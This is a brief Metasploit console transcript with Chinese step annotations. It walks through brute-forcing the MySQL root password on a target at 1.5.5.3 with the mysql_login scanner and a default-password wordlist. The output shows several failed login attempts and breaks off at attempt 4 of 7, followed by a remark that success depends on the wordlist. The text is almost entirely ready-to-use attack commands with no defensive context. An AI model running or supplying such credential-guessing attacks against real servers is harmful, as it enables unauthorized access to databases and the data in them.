msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf連接數據庫
[*] Rebuilding the module cache in the background...
msf > db_status 查看數據庫連接狀態
[*] postgresql connected to msf3
msf > use auxiliary/scanner/mysql/mysql_login 加載掃描模塊
msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3 目標IP地址
RHOSTS => 1.5.5.3
msf auxiliary(mysql_login) > set USERNAME root 目標用戶名 一般爲root
USERNAME => root
msf auxiliary(mysql_login) > set
PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt 密碼字典路勁,路勁隨意填寫
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txt
msf auxiliary(mysql_login) > exploit 開始掃描
[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16
[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”
[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”
[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’
[*] 1.5.5.3:3306 MYSQL – [2/7] – failed to login as ‘root’ with password ‘root’
[*] 1.5.5.3:3306 MYSQL – [3/7] – Trying username:’root’ with password:’tiger’
[*] 1.5.5.3:3306 MYSQL – [3/7] – failed to login as ‘root’ with password ‘tiger’
[*] 1.5.5.3:3306 MYSQL – [4/7] – Trying username:’root’ with password:’postgres’
能否掃描出來主要看密碼字典